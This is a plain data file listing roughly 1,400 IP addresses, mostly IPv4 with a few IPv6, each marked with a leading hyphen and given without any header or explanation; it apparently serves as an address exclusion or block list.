-51.15.196.8 -192.154.97.76 -211.152.52.73 -222.73.155.150 -117.41.184.114 -130.185.76.119 -121.40.69.209 -191.96.102.126 -125.39.193.228 -58.64.183.245 -103.100.157.154 -192.80.147.233 -212.34.240.203 -122.114.72.232 -217.65.8.62 -120.24.18.45 -114.55.25.3 -222.186.190.37 -115.28.92.185 -45.79.102.114 -216.157.100.137 -183.246.68.104 -222.90.73.246 -115.28.129.141 -206.217.197.146 -202.51.103.190 -51.254.244.182 -205.209.135.72 -103.43.71.179 -54.178.23.26 -27.254.62.218 -119.90.97.58 -72.1.245.87 -61.175.216.238 -89.185.228.86 -98.252.182.7 -218.29.110.58 -23.224.243.5 -134.236.242.41 -50.116.61.131 -172.246.101.94 -121.40.138.162 -198.144.157.55 -45.61.115.29 -166.62.97.100 -23.244.190.37 -149.202.86.186 -101.200.63.114 -77.92.144.29 -210.33.124.92 -41.57.103.122 -45.114.94.48 -121.199.10.95 -45.32.50.139 -188.132.148.104 -109.201.146.108 -121.40.205.112 -23.225.113.249 -173.230.138.125 -192.169.196.241 -69.64.77.194 -120.26.134.68 -79.137.70.154 -123.57.44.75 -103.68.81.184 -222.85.161.70 -37.18.184.47 -153.122.27.81 -213.159.7.10 -46.29.93.129 -192.251.238.100 -13.113.195.170 -128.204.216.231 -107.187.41.20 -94.23.243.194 -47.94.129.212 -118.193.140.167 -175.102.128.174 -194.28.112.91 -210.86.239.46 -23.224.245.13 -178.32.190.88 -200.29.18.119 -104.203.82.72 -101.37.173.220 -218.94.40.155 -114.67.231.162 -184.154.216.35 -45.76.189.132 -23.225.113.16 -122.114.59.145 -5.196.70.226 -5.135.36.102 -174.139.53.153 -182.92.97.98 -104.238.160.63 -23.104.135.250 -5.135.167.91 -66.254.176.75 -114.55.224.26 -193.106.95.105 -23.224.115.173 -138.201.142.149 -199.231.76.18 -209.216.230.78 -46.182.29.2 -193.104.170.41 -107.161.18.198 -167.114.54.86 -133.242.20.141 -88.99.68.44 -45.249.245.200 -5.135.58.85 -203.66.14.220 -46.4.10.78 -114.215.145.153 -120.76.245.191 -192.95.39.51 -35.185.142.216 -205.209.155.209 -114.55.116.98 -46.43.50.94 -115.28.151.208 -112.74.27.6 -104.224.233.60 -139.129.164.191 -166.63.21.67 -23.224.115.133 -115.231.222.37 -104.203.82.106 -202.111.185.186 -118.113.239.157 -174.139.70.149 -139.196.8.87 -121.40.224.44 -23.225.113.102 -23.224.115.62 -37.143.10.243 -119.23.51.143 -123.59.146.250 -23.224.245.43 -139.162.12.225 -176.80.170.234 -46.105.118.137 -54.173.208.123 -113.161.75.223 -103.204.76.117 -193.104.170.186 -207.20.231.27 -92.43.117.202 -47.95.244.7 -118.163.155.62 -124.6.15.30 -23.88.82.68 -121.42.143.82 -119.131.90.216 -222.35.92.171 -172.104.42.225 -52.63.19.164 -173.236.43.130 -37.187.79.23 -121.42.53.24 -60.205.94.130 -172.104.47.94 -118.178.241.245 -208.82.149.6 -185.174.30.188 -46.226.111.223 -104.165.42.50 -52.73.79.249 -54.209.1.244 -64.235.56.228 -192.163.233.147 -185.221.152.206 -112.121.162.234 -23.225.239.248 -185.27.134.40 -58.250.45.10 -210.83.225.168 -5.135.58.119 -35.194.194.27 -116.62.105.26 -190.15.138.150 -123.57.36.97 -220.226.210.51 -174.37.182.149 -118.178.181.160 -173.236.41.140 -108.170.59.216 -93.90.207.141 -115.28.189.224 -37.143.15.46 -23.244.190.202 -119.42.148.234 -104.250.135.19 -144.168.71.137 -106.112.248.72 -120.76.212.211 -115.28.216.107 -115.29.246.202 -49.50.8.107 -123.56.253.21 -81.215.13.141 -123.252.193.117 -173.160.42.2 -142.4.107.242 -103.45.98.186 -138.201.170.126 -124.167.254.148 -216.75.62.95 -5.196.250.101 -103.59.166.121 -75.126.95.46 -72.1.245.57 -188.132.204.32 -212.68.50.125 -185.66.140.50 -149.202.75.229 -138.201.83.227 -23.104.135.73 -13.114.56.104 -164.52.150.247 -218.75.104.107 -45.76.170.129 -54.234.233.65 -167.114.178.208 -120.85.134.121 -119.29.196.23 -176.223.197.48 -116.213.76.9 -180.76.157.252 -89.163.247.46 -23.225.113.73 -174.37.242.45 -103.31.227.83 -37.187.252.53 -103.213.251.86 -31.131.18.168 -95.163.76.40 -46.182.29.8 -91.240.60.33 -213.215.219.164 -153.126.133.97 -185.174.30.181 -112.78.10.82 -139.162.1.170 -112.78.139.238 -35.184.232.23 -182.254.133.48 -103.100.157.135 -123.207.246.121 -112.74.130.190 -217.174.144.30 -185.125.216.107 -137.74.201.24 -103.15.184.37 -104.238.176.231 -185.66.142.55 -203.154.73.20 -101.226.247.45 -119.23.64.57 -184.73.146.220 -47.52.144.58 -45.79.136.82 -51.255.200.30 -117.139.199.104 -78.24.216.109 -112.121.162.236 -54.165.116.77 -182.61.39.150 -89.33.247.28 -178.33.15.86 -153.92.42.160 -31.210.159.187 -83.142.189.100 -210.14.76.247 -82.135.151.158 -197.249.0.236 -120.25.159.175 -77.75.124.179 -162.217.97.200 -192.36.38.67 -168.194.68.20 -121.41.103.180 -125.253.127.158 -120.136.36.170 -42.96.195.56 -65.60.59.123 -103.27.238.98 -116.62.33.84 -119.29.137.235 -185.38.164.130 -5.254.88.184 -202.43.163.19 -199.188.104.2 -65.60.28.167 -94.23.251.110 -172.247.51.76 -163.44.206.242 -188.165.189.246 -216.227.221.153 -94.23.182.73 -121.40.185.174 -103.214.170.17 -151.80.41.233 -35.227.164.78 -14.192.17.169 -204.93.61.103 -92.43.117.203 -45.32.255.44 -47.93.172.56 -94.23.19.191 -220.179.42.217 -49.212.147.16 -173.230.251.180 -45.61.114.27 -158.69.130.105 -199.204.185.59 -65.60.5.90 -124.192.148.18 -217.76.40.56 -45.77.101.45 -82.135.151.131 -103.9.185.245 -108.170.39.94 -184.154.181.210 -139.129.128.34 -185.124.84.163 -50.63.185.139 -109.124.81.131 -23.224.115.85 -23.234.26.247 -5.79.19.231 -153.122.4.228 -108.170.98.70 -5.135.224.53 -120.136.36.172 -68.64.163.76 -173.236.107.52 -171.41.192.186 -182.16.57.94 -166.62.91.194 -91.134.114.208 -139.196.148.154 -150.107.72.67 -186.118.161.66 -115.47.150.198 -103.28.38.3 -191.98.183.6 -182.18.61.218 -54.193.80.32 -182.254.157.15 -142.44.191.37 -47.52.110.191 -103.58.116.9 -199.188.104.3 -34.231.236.133 -177.200.207.37 -23.225.113.2 -119.28.187.106 -5.189.174.118 -173.212.245.239 -43.249.143.130 -45.61.115.9 -103.197.69.247 -203.86.47.86 -120.27.235.110 -120.205.152.70 -61.50.195.18 -98.142.108.28 -121.40.19.189 -23.253.73.145 -87.98.233.139 -23.224.115.106 -113.164.233.202 -175.170.191.204 -46.105.224.99 -23.225.89.229 -101.200.182.11 -23.88.82.225 -66.254.175.37 -54.165.243.69 -5.39.13.0 -123.57.5.64 -106.185.24.250 -108.61.160.39 -166.62.44.54 -87.98.159.227 -112.74.21.14 -46.226.227.112 -122.10.92.246 -221.209.110.142 -23.224.243.61 -174.142.54.11 -34.204.53.254 -170.231.83.37 -218.78.213.176 -107.180.78.65 -45.114.94.204 -70.36.125.37 -125.39.139.78 -162.247.233.41 -91.230.194.84 -188.165.254.75 -202.51.200.2 -163.44.207.186 -195.110.59.218 -202.72.210.124 -103.3.60.92 -23.104.135.194 -23.244.241.75 -13.228.174.121 -157.7.249.6 -13.228.117.224 -94.140.123.139 -192.99.78.14 -42.96.196.31 -154.0.163.37 -62.109.18.222 -122.54.75.188 -198.200.41.91 -139.199.177.130 -212.193.96.174 -5.135.58.122 -114.55.102.239 -217.115.137.196 -104.156.227.77 -89.136.199.109 -217.23.11.238 -120.25.98.194 -69.87.198.122 -103.226.203.40 -120.76.189.135 -114.215.42.92 -190.90.128.114 -37.48.109.221 -50.62.141.105 -13.114.202.153 -103.90.241.124 -34.201.77.88 -5.135.224.39 -45.114.94.114 -198.24.163.228 -213.219.37.31 -185.171.24.108 -151.248.122.28 -79.124.90.109 -118.193.165.233 -183.232.52.10 -103.250.21.97 -157.181.227.91 -182.92.103.114 -144.217.224.237 -31.210.119.120 -95.183.8.217 -204.197.242.233 -45.125.33.27 -211.48.100.116 -216.158.225.196 -103.100.157.224 -54.65.137.207 -23.225.239.244 -65.60.43.187 -89.238.226.74 -188.116.3.171 -118.178.94.215 -182.16.29.82 -94.23.83.98 -5.135.58.86 -164.160.33.186 -172.104.51.164 -60.173.37.42 -23.225.89.101 -203.141.134.169 -216.69.172.80 -23.104.135.244 -54.173.193.156 -153.122.98.194 -217.174.148.41 -218.19.216.149 -125.227.59.121 -54.173.142.66 -13.56.174.232 -123.57.165.236 -69.87.197.174 -182.92.234.151 -192.121.36.151 -125.212.220.185 -92.43.117.199 -101.200.52.9 -23.224.115.59 -121.40.39.133 -51.255.160.118 -62.76.114.207 -74.86.126.229 -194.226.28.38 -172.104.191.239 -107.181.251.148 -122.2.133.121 -101.254.166.103 -88.99.60.79 -203.122.25.59 -125.253.127.246 -139.199.154.157 -218.1.117.215 -23.234.27.112 -198.175.127.118 -112.121.167.178 -209.58.147.167 -65.60.59.121 -136.0.69.127 -89.19.8.202 -179.191.235.190 -212.68.42.217 -139.199.28.233 -188.165.187.54 -212.68.42.55 -62.152.54.10 -216.131.75.4 -93.174.7.174 -125.253.127.115 -178.20.155.175 -185.27.175.66 -23.224.242.46 -195.88.35.66 -173.212.248.209 -37.187.252.148 -87.98.234.75 -125.253.127.146 -176.119.61.178 -37.46.128.191 -101.201.42.139 -211.154.198.61 -192.99.249.77 -185.37.228.141 -119.23.161.54 -67.225.249.249 -112.121.109.161 -95.172.16.82 -122.228.248.103 -117.48.214.110 -125.253.127.133 -173.212.231.11 -123.59.151.229 -104.251.238.129 -66.180.197.237 -37.123.117.241 -125.253.127.245 -31.222.162.99 -119.42.150.78 -114.80.207.18 -115.28.167.118 -85.15.200.12 -166.62.84.203 -23.244.190.72 -182.16.20.44 -23.225.239.58 -198.245.62.226 -123.207.118.210 -91.217.76.7 -121.42.252.192 -139.162.191.136 -23.224.115.140 -23.225.113.150 -198.24.163.248 -46.105.98.124 -216.131.116.73 -125.253.127.248 -176.31.30.12 -144.217.39.208 -23.225.89.79 -101.50.3.232 -69.50.195.52 -87.98.136.114 -50.203.238.5 -108.161.128.107 -178.32.219.104 -185.85.73.253 -115.159.103.38 -103.84.89.135 -198.24.128.25 -172.246.101.40 -23.253.102.15 -120.26.233.134 -116.236.231.170 -104.238.138.188 -23.225.89.64 -82.135.151.212 -47.93.190.35 -65.60.5.100 -101.200.154.226 -96.44.167.99 -104.130.134.218 -208.110.86.98 -45.79.82.180 -132.204.25.26 -183.131.212.94 -137.110.119.114 -222.186.32.152 -218.75.223.137 -123.206.74.109 -209.11.159.120 -114.249.24.235 -119.29.204.181 -107.23.236.117 -132.248.55.208 -104.165.37.240 -58.217.158.16 -54.254.141.50 -123.31.41.23 -45.32.113.108 -51.255.88.39 -142.4.103.95 -125.253.127.120 -31.186.96.29 -35.200.200.66 -185.174.30.131 -103.15.64.117 -185.80.48.156 -43.230.200.109 -183.62.249.10 -31.186.241.100 -74.82.48.4 -107.6.168.133 -125.253.127.191 -178.238.238.226 -198.50.194.85 -185.163.100.23 -222.211.65.80 -144.217.83.150 -114.215.180.67 -45.77.43.124 -125.253.116.34 -23.224.244.49 -103.87.228.113 -119.23.36.22 -125.253.127.122 -222.191.251.253 -125.253.127.151 -5.196.183.230 -125.253.127.159 -103.22.181.198 -187.72.165.200 -221.206.88.109 -104.207.50.79 -153.122.51.193 -82.135.151.208 -74.207.247.205 -95.163.97.83 -61.141.124.129 -103.235.234.216 -69.87.198.114 -107.187.41.27 -121.41.25.123 -125.253.127.11 -91.196.185.98 -207.58.147.101 -164.132.239.60 -54.169.121.11 -47.90.97.7 -103.90.220.105 -112.74.94.197 -112.74.69.28 -98.142.106.24 -45.124.94.189 -60.18.41.208 -209.95.39.148 -2600:3c01::f03c:91ff:fe84:6d23 -120.76.141.173 -192.121.107.153 -64.118.92.57 -153.120.50.216 -111.93.76.66 -13.113.218.217 -218.66.16.77 -107.180.68.192 -172.246.101.16 -209.126.118.82 -35.198.220.101 -199.102.44.73 -106.38.205.148 -115.28.57.10 -201.238.235.7 -202.40.190.227 -202.76.236.107 -121.41.17.253 -193.111.62.250 -174.139.182.114 -93.174.163.191 -120.24.67.74 -198.24.161.133 -123.30.139.29 -123.30.139.28 -192.121.44.5 -209.222.138.130 -125.253.127.252 -54.37.85.43 -101.200.121.187 -115.29.35.136 -218.64.91.4 -23.225.113.143 -182.16.108.14 -5.200.52.7 -59.153.61.153 -216.127.161.17 -65.60.46.148 -185.174.28.141 -47.94.238.30 -45.61.115.56 -72.1.245.77 -45.35.125.58 -108.61.169.98 -112.74.42.106 -1.9.70.114 -107.172.27.29 -45.77.43.18 -192.64.86.22 -82.135.151.180 -66.154.105.92 -172.247.51.216 -82.135.151.185 -112.124.106.166 -54.89.125.212 -185.174.31.219 -23.225.89.121 -188.213.22.153 -149.56.167.135 -67.228.171.235 -59.38.32.158 -106.14.25.81 -106.3.40.169 -153.122.51.191 -107.181.250.197 -61.142.176.23 -206.190.153.81 -123.206.211.123 -54.36.43.146 -112.121.170.126 -199.119.140.46 -106.14.197.102 -109.169.76.36 -184.72.62.209 -212.129.25.34 -2a00:afe0:0:1:400:b9ff:fe1e:5c86 -45.33.117.27 -23.244.241.224 -139.162.55.43 -91.203.164.235 -172.104.160.114 -121.201.15.227 -216.117.132.224 -151.248.125.192 -36.226.128.121 -62.210.17.128 -209.239.123.200 -106.185.47.179 -123.58.254.3 -37.187.140.233 -69.64.33.75 -120.76.220.27 -119.9.39.153 -64.110.129.94 -121.43.160.173 -5.255.80.80 -107.187.41.172 -103.12.51.15 -45.76.171.79 -142.44.201.199 -5.153.48.245 -34.217.81.143 -103.12.50.43 -62.109.18.44 -213.138.74.61 -107.180.85.194 -5.9.149.68 -120.55.81.86 -144.123.43.78 -64.235.53.105 -185.38.45.120 -67.19.21.139 -42.112.20.90 -45.114.94.162 -167.250.0.11 -104.203.82.101 -37.59.81.79 -45.76.236.251 -112.121.184.210 -23.88.82.88 -216.131.119.107 -171.244.32.185 -23.23.149.189 -87.106.93.159 -119.29.99.42 -23.225.239.85 -153.126.168.218 -173.0.63.198 -81.171.34.41 -151.248.123.29 -107.164.66.64 -157.7.245.131 -84.47.161.45 -91.236.229.7 -5.239.244.34 -220.249.195.236 -209.59.174.45 -95.213.245.210 -198.27.70.76 -52.70.29.253 -193.70.94.252 -47.88.22.47 -58.64.185.240 -123.59.20.103 -173.212.196.162 -45.79.104.96 -23.88.82.222 -52.5.147.175 -142.4.119.105 -112.74.74.238 -72.1.245.29 -101.132.180.1 -121.42.186.174 -157.7.245.58 -103.62.236.227 -74.50.63.180 -104.207.44.113 -5.79.4.130 -103.100.157.56 -192.80.147.140 -180.153.44.11 -123.133.31.31 -50.63.19.24 -103.100.157.61 -47.97.198.220 -66.85.158.107 -120.24.190.164 -88.150.168.82 -222.255.122.173 -112.124.118.142 -51.254.202.233 -173.249.25.127 -50.19.31.17 -117.4.90.220 -89.231.152.175 -198.204.231.138 -120.77.5.162 -61.63.20.101 -120.26.46.148 -45.41.92.164 -70.36.125.50 -161.202.21.223 -124.160.118.75 -139.162.24.80 -113.77.242.190 -45.35.125.52 -123.57.67.117 -209.126.127.76 -185.174.28.79 -35.194.139.169 -42.96.164.164 -192.95.3.44 -185.51.67.119 -45.77.36.191 -183.111.138.178 -5.199.134.183 -121.201.34.17 -123.57.54.209 -109.235.252.134 -103.12.50.40 -83.144.103.141 -185.182.96.24 -121.41.93.59 -60.205.92.154 -162.247.232.85 -114.55.24.177 -86.104.177.88 -160.16.137.237 -182.151.196.56 -149.202.57.237 -2400:8500:1302:822:a150:95:141:2040 -101.200.60.249 -202.65.131.230 -185.163.100.51 -120.26.138.114 -209.188.18.201 -213.189.38.12 -222.173.120.14 -45.76.10.181 -185.47.5.47 -122.49.12.61 -198.8.88.202 -120.24.180.149 -46.245.167.37 -42.62.29.202 -65.60.43.180 -204.197.253.163 -219.136.254.13 -190.247.28.116 -185.26.48.233 -163.53.193.118 -112.124.105.0 -23.225.239.39 -107.174.70.245 -54.251.141.96 -121.40.47.93 -216.158.235.14 -212.19.138.208 -173.232.149.162 -31.28.166.252 -210.22.20.187 -93.159.128.114 -82.146.45.165 -192.169.190.119 -5.39.93.90 -172.246.101.93 -192.121.64.150 -23.224.242.34 -139.99.100.186 -182.16.48.186 -185.174.30.182 -109.235.252.133 -106.14.71.29 -113.88.111.212 -75.126.121.180 -209.205.219.98 -173.193.29.242 -193.33.133.29 -23.244.190.54 -172.104.174.85 -103.205.104.132 -47.88.139.43 -195.229.192.19 -192.99.10.26 -23.88.82.73 -218.108.53.118 -91.223.195.51 -23.235.234.23 -109.73.168.201 -47.94.100.26 -81.192.138.20 -216.104.35.70 -45.114.94.15 -182.92.165.108 -95.142.174.37 -162.209.213.126 -58.82.224.164 -85.214.124.129 -103.12.49.22 -123.57.24.188 -210.116.113.151 -103.198.68.49 -104.203.82.49 -138.201.137.101 -47.100.78.51 -2.88.166.13 -121.41.85.118 -89.16.191.216 -123.57.14.90 -85.204.50.38 -101.200.208.115 -37.187.42.157 -89.250.10.161 -187.72.81.104 -121.41.50.133 -23.225.239.177 -120.210.129.29 -185.163.100.174 -109.73.168.204 -151.80.151.179 -192.99.93.183 -101.132.143.155 -69.20.42.79 -120.78.72.183 -209.236.114.124 -221.146.229.3 -103.208.32.32 -5.39.121.109 -87.120.207.231 -107.164.229.115 -77.92.144.15 -92.42.37.73 -78.47.132.74 -116.62.44.88 -120.76.118.157 -120.26.111.177 -81.9.18.102 -164.132.83.0 -211.157.24.143 -77.38.125.162 -61.151.239.67 -47.254.26.161 -124.133.1.73 -37.143.8.229 -122.114.125.229 -120.25.77.50 -149.202.46.17 -54.64.174.112 -182.48.189.115 -144.202.69.140 -158.69.36.12 -50.116.10.38 -118.190.95.196 -216.224.162.20 -185.193.57.254 -213.136.68.91 -61.90.146.220 -69.89.11.115 -94.23.78.251 -66.228.54.160 -107.180.84.69 -103.72.166.174 -166.62.85.87 -120.35.0.61 -23.253.100.148 -37.187.141.107 -176.223.197.40 -23.244.241.178 -121.43.233.145 -64.15.141.40 -172.247.51.109 -82.146.36.186 -115.159.42.178 -123.58.4.187 -14.192.8.236 -172.246.101.135 -47.90.35.41 -167.114.163.247 -64.120.123.211 -120.26.94.103 -103.80.134.216 -64.110.130.113 -107.152.107.82 -128.0.54.190 -104.250.135.2 -92.53.121.148 -104.224.233.59 -107.187.41.134 -65.60.46.153 -119.29.246.80 -183.111.138.157 -47.92.140.40 -91.134.115.167 -177.101.147.179 -139.196.172.110 -116.249.77.71 -5.150.131.179 -120.25.200.196 -139.210.109.37 -62.129.149.99 -23.225.239.73 -81.171.38.247 -88.99.59.239 -112.124.6.205 -95.215.177.162 -180.100.134.38 -37.247.104.27 -139.129.206.167 -193.193.200.227 -45.114.94.14 -107.180.85.190 -23.23.106.108 -47.93.121.125 -108.160.159.58 -210.14.72.61 -149.202.50.236 -203.110.81.43 -185.174.28.125 -77.75.124.187 -202.6.17.164 -118.89.31.229 -192.151.151.194 -103.218.242.235 -121.42.192.232 -125.227.86.177 -198.50.153.171 -1.55.145.17 -118.67.101.8 -65.60.28.162 -121.43.235.145 -185.38.151.118 -172.93.38.37 -112.74.81.181 -219.83.56.84 -104.203.82.128 -93.187.203.178 -104.130.247.153 -119.23.48.79 -31.28.166.243 -107.150.25.6 -218.26.115.245 -185.163.100.217 -118.190.70.63 -103.210.239.245 -188.120.242.128 -120.26.77.0 -123.57.160.52 -222.86.168.228 -54.221.138.202 -118.178.130.84 -54.153.95.136 -113.111.49.131 -112.124.6.135 -120.76.29.179 -67.228.175.237 -139.162.2.134 -182.92.96.212 -34.238.80.45 -158.69.142.153 -125.63.126.31 -119.59.108.247 -182.16.93.43 -5.196.76.120 -23.225.0.239 -172.246.101.85 -23.244.241.181 -178.22.67.81 -120.26.210.80 -164.132.56.137 -172.99.112.101 -149.71.99.5 -72.52.218.226 -120.24.240.85 -58.22.108.120 -198.50.176.72 -5.196.216.193 -115.28.0.69 -158.69.36.24 -119.10.8.105 -188.95.48.56 -172.247.51.205 -35.225.18.152 -188.165.187.57 -139.162.30.244 -172.246.101.123 -117.107.209.64 -192.95.26.177 -119.23.216.208 -47.93.231.84 -107.22.151.120 -116.62.8.82 -198.58.114.10 -107.187.41.98 -23.244.241.154 -87.98.157.32 -5.196.14.161 -115.29.147.180 -45.77.72.221 -100.43.157.125 -139.199.11.100 -91.237.109.40 -54.233.196.190 -173.214.250.20 -172.247.51.88 -120.76.180.207 -153.122.6.64 -45.126.132.198 -45.76.150.21 -23.104.180.26 -37.58.84.252 -197.96.139.133 -120.77.92.120 -211.21.114.134 -51.15.193.148 -103.14.35.36 -121.43.33.57 -208.101.47.3 -59.120.48.10 -144.217.6.169 -185.31.160.91 -172.246.101.153 -213.202.252.214 -114.248.250.204 -52.55.171.132 -52.197.166.211 -112.199.79.165 -103.12.50.37 -118.26.171.86 -162.247.232.93 -66.254.189.86 -120.24.47.188 -172.247.51.213 -174.127.120.139 -144.217.242.212 -121.42.159.16 -164.132.163.81 -72.1.245.120 -112.74.57.176 -23.224.115.45 -188.165.168.149 -81.22.110.208 -146.20.85.102 -103.28.36.157 -213.115.224.79 -125.218.116.15 -217.23.4.56 -204.8.179.96 -66.171.239.108 -111.207.147.137 -82.135.151.127 -185.163.100.44 -52.91.216.228 -46.32.228.109 -31.131.18.159 -162.212.252.227 -115.29.141.143 -139.129.213.90 -103.40.162.80 -23.104.135.96 -82.135.151.165 -112.74.215.145 -123.56.176.153 -5.101.61.197 -192.151.159.50 -66.254.177.73 -88.99.240.238 -115.146.127.78 -120.24.37.162 -142.4.119.94 -122.114.26.180 -91.210.189.243 -180.131.41.174 -103.205.82.12 -107.161.169.85 -112.74.84.81 -185.174.29.239 -112.74.77.223 -149.56.133.91 -123.56.155.203 -107.181.251.157 -173.255.192.129 -172.110.18.216 -182.16.93.46 -23.104.177.8 -42.121.121.113 -114.251.121.173 -185.174.29.166 -91.134.144.10 -195.88.72.97 -82.135.151.107 -52.36.225.72 -193.104.170.47 -92.241.162.13 -54.186.163.37 -119.97.218.227 -158.69.184.33 -82.135.151.124 -212.1.209.241 -182.72.208.184 -153.122.42.112 -121.40.31.196 -117.78.40.56 -23.104.135.121 -123.57.176.102 -122.227.255.142 -104.165.44.108 -185.80.152.100 -54.36.138.45 -209.58.150.35 -139.129.160.108 -173.230.149.69 -23.225.0.175 -166.62.91.251 -61.166.172.88 -116.196.113.144 -119.6.241.202 -178.238.224.86 -34.198.163.7 -14.139.86.53 -121.40.47.114 -188.225.78.66 -81.169.180.212 -104.203.82.69 -77.77.150.14 -51.255.53.169 -202.6.17.167 -131.108.125.58 -167.114.220.87 -118.190.204.77 -117.159.25.212 -120.24.230.67 -64.120.123.223 -198.54.124.17 -119.29.228.139 -23.225.196.237 -123.59.160.13 -195.201.5.170 -158.69.100.54 -94.236.65.250 -121.199.6.204 -66.154.119.69 -64.120.123.185 -187.177.166.191 -185.191.228.156 -188.165.141.188 -139.129.19.126 -121.201.65.185 -23.225.0.71 -202.168.148.225 -201.33.23.104 -47.88.16.219 -213.5.182.12 -185.114.192.37 -120.76.98.66 -88.99.106.163 -116.230.245.93 -52.29.121.33 -103.12.68.3 -23.88.82.23 -45.56.99.60 -125.253.127.197 -111.225.207.163 -119.29.178.140 -200.98.129.86 -112.74.13.252 -91.215.158.44 -172.246.101.71 -23.104.180.8 -201.238.213.54 -212.27.53.215 -182.92.98.38 -142.4.107.239 -198.200.41.6 -125.212.201.1 -45.114.94.63 -87.98.184.203 -35.176.247.251 -115.29.136.207 -137.74.43.219 -41.231.54.61 -118.97.232.150 -121.199.21.107 -121.40.94.231 -46.105.52.179 -178.238.236.74 -5.189.184.235 -45.61.113.34 -103.1.40.224 -103.12.49.2 -23.224.115.113 -23.225.239.79 -211.230.149.212 -151.236.216.25 -221.6.134.43 -120.27.227.81 -162.248.245.165 -103.70.68.246 -66.171.236.52 -27.17.54.118 -178.32.163.119 -112.121.165.69 -139.129.226.117 -103.52.146.211 -104.203.82.241 -194.187.96.73 -222.122.192.150 -185.163.100.181 -219.138.66.174 -113.88.28.104 -103.205.98.217 -86.104.177.101 -120.78.226.79 -116.30.5.151 -172.246.101.81 -218.17.30.29 -161.202.10.149 -190.196.2.75 -23.239.12.99 -119.29.113.225 -119.23.255.216 -23.224.243.12 -166.63.21.97 -43.247.13.5 -47.52.47.246 -103.12.155.210 -82.135.151.22 -158.199.195.170 -46.45.139.110 -94.23.155.125 -106.14.249.184 -114.55.7.174 -45.114.94.1 -91.237.108.41 -172.246.101.74 -133.242.13.217 -121.42.192.63 -64.46.58.77 -23.224.243.38 -43.240.6.134 -204.44.73.218 -35.189.131.233 -203.160.59.106 -202.147.5.161 -198.57.187.99 -138.201.60.225 -103.12.50.5 -213.171.44.68 -43.254.106.50 -82.223.22.184 -120.26.118.189 -188.132.147.231 -118.184.18.23 -107.181.251.144 -115.159.150.80 -54.171.133.245 -144.217.41.124 -112.95.170.155 -218.15.58.6 -23.244.190.53 -23.104.180.45 -185.144.230.55 -220.165.247.150 -120.25.221.208 -66.154.119.135 -132.148.13.127 -104.203.82.222 -54.80.96.61 -108.163.177.30 -179.61.225.252 -216.92.208.63 -111.231.107.49 -142.44.139.166 -120.25.234.126 -119.226.73.126 -58.241.250.228 -119.23.249.113 -222.240.197.189 -120.133.2.19 -120.27.146.2 -91.205.175.159 -2607:7c80:54:10::190 -133.242.229.199 -60.191.233.150 -216.189.159.134 -144.217.243.145 -49.212.174.171 -46.105.74.116 -142.4.107.114 -185.114.192.45 -222.73.196.104 -23.239.13.54 -118.190.172.153 -61.48.217.219 -146.148.20.147 -120.25.80.134 -39.108.13.66 -101.37.86.40 -72.52.135.87 -39.108.6.53 -182.71.201.185 -103.7.41.103 -37.188.116.5 -23.104.176.16 -49.212.174.221 -23.225.89.25 -47.93.35.229 -137.74.22.233 -217.113.1.204 -103.235.238.84 -171.14.91.168 -124.173.118.10 -164.70.8.90 -120.76.192.231 -180.172.35.76 -158.69.93.77 -82.135.151.95 -23.104.135.140 -77.92.144.20 -201.139.92.10 -112.126.69.160 -121.41.101.36 -103.241.50.141 -120.26.128.69 -81.169.247.244 -23.252.161.27 -103.198.45.49 -54.178.160.183 -51.255.151.200 -123.207.249.31 -103.224.250.34 -72.52.162.68 -123.56.207.163 -104.203.82.127 -139.162.1.59 -66.154.119.245 -54.162.62.233 -210.140.130.12 -123.207.246.100 -94.250.251.59 -96.44.167.109 -169.57.62.134 -115.159.38.249 -49.1.244.136 -185.174.28.18 -109.68.190.68 -82.135.151.172 -125.253.127.134 -107.20.183.18 -166.78.109.121 -182.73.36.114 -149.202.147.107 -116.255.131.43 -112.74.194.111 -192.155.227.76 -86.104.177.17 -23.104.177.49 -209.126.96.5 -115.248.44.181 -52.210.137.41 -192.187.113.26 -62.109.2.149 -66.228.33.130 -177.124.195.140 -203.189.88.57 -134.119.66.114 -178.132.2.49 -104.237.63.140 -104.203.82.140 -31.220.0.13 -200.11.243.13 -39.106.113.123 -23.224.115.175 -86.104.177.126 -132.148.14.73 -54.225.2.172 -82.98.132.241 -121.40.170.148 -120.24.65.97 -123.56.15.158 -149.210.143.133 -23.225.0.202 -45.32.174.154 -115.159.119.204 -58.56.88.75 -23.244.190.154 -139.196.168.144 -92.75.22.134 -27.122.57.94 -34.228.247.195 -84.39.32.25 -23.224.115.52 -72.1.245.101 -106.185.33.62 -106.187.102.59 -120.25.95.3 -45.125.48.111 -82.98.166.13 -60.188.232.112 -112.74.129.80 -23.244.241.61 -54.223.129.252 -192.99.24.27 -185.66.140.48 -87.237.202.112 -101.71.102.49 -182.92.1.71 -23.225.0.67 -188.225.47.111 -166.62.88.5 -212.1.107.6 -104.165.42.49 -23.104.187.6 -181.214.55.112 -64.15.141.42 -67.229.72.76 -103.100.157.103 -103.21.229.163 -103.100.157.40 -103.100.157.37 -103.235.238.91 -49.212.134.35 -186.233.189.250 -2001:da8:214:1100:20c:29ff:fe30:918c -66.254.178.28 -103.100.157.38 -115.68.89.40 -121.42.44.68 -142.4.107.209 -46.20.11.77 -23.104.187.42 -178.32.190.85 -115.28.216.61 -107.165.201.64 -39.107.89.9 -66.154.108.68 -67.229.73.110 -112.121.170.125 -86.104.177.83 -133.242.195.154 -54.203.16.10 -23.244.241.40 -162.246.57.4 -149.56.24.155 -45.77.171.49 -79.137.17.220 -49.212.178.47 -208.96.162.251 -61.8.35.214 -212.67.219.152 -61.144.244.212 -77.241.16.13 -155.94.243.121 -54.36.30.241 -185.163.100.145 -209.239.123.210 -94.23.193.134 -34.228.67.84 -114.80.96.144 -106.14.67.142 -108.170.59.211 -185.24.221.90 -89.22.98.2 -207.38.90.13 -103.28.38.145 -45.114.94.212 -88.198.47.50 -64.120.123.138 -101.37.168.153 -101.37.168.153 -134.213.152.173 -27.133.144.244 -210.245.18.134 -121.40.157.71 -186.235.187.82 -85.214.254.55 -180.102.178.161 -120.27.129.114 -46.105.121.6 -183.237.68.242 -103.1.40.62 -114.55.106.189 -221.192.230.51 -177.124.77.180 -167.114.54.88 -108.170.39.93 -23.225.0.253 -103.42.15.181 -39.155.167.48 -23.88.82.50 -172.246.101.249 -103.44.145.245 -67.213.218.20 -123.206.104.174 -118.144.162.18 -114.55.24.112 -104.207.52.118 -139.196.18.156 -142.91.95.232 -185.43.220.151 -210.56.23.110 -80.90.172.25 -185.38.45.115 -107.181.251.158 -77.223.141.119 -185.131.50.83 -37.187.131.152 -106.75.176.132 -149.56.17.212 -47.92.67.119 -45.41.92.147 -112.74.52.109 